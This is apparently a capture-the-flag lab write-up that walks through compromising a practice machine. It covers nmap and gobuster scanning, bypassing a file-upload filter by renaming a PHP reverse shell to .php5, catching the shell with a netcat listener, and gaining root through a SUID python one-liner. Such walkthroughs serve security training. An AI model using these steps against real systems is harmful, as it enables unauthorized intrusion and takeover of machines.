Reconnaissance

Scan the machine

1

nmap -sV -O <ip> -v

Apache version

Checking the previous output to found the good version.

Service on port 22

Checking the previous output to found the good service name.

Find hidden directories on the web server

We can use Go buster as proposed to found some hidden directory.

1

gobuster dir -u <ip> -w /usr/share/wordlists/dirb/big.txt

The answer is listed in the output.

Getting a shell

Let’s browse the website to this hidden directory to check what is behind. There is a form to upload a file. Let’s inject a reverse shell.

Locate the reverse shell in the attack box

1

find / -name *php-reverse-shell*

Then open the file and update it accordingly to your configuration.

Then try to upload this file into the website. You will receive an error saying that php file are not allowed. Rename the file to another extension.

1

cp php-reverse-shell.php php-reverse-shell.php5

Upload succeed.

Open the reverse shell on your attack box first. Specify the port configured in the reverse shell file.

1

nc -nvlp 1234

Then go the another interresting directory identify with gobuster analysis to access the file just uploaded. When you open the file, the shell will popup on the attackbox.

Identify your current user and try to found the flag file (user.txt as specified)

1
2
3

whoami
find / -name *user.txt*
cat {REDACTED}/user.txt

Privilege Escalation

SUID permission

As requested, search file with SUID permission. Search for SUID files

1

find / -perm /4000 2>/dev/null

perm 4000 allow us to search file with SUID bit set.

In the output you will found the good answer.

Then go to GTFOBins to found a way to upgrade your privilege to root with the previous binaries identified. Execute the command

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Then identify your new use and found the flag (root.txt)

1
2
3

whoami
find / -name root.txt
cat {REDACTED}/root.txt

And the room is done.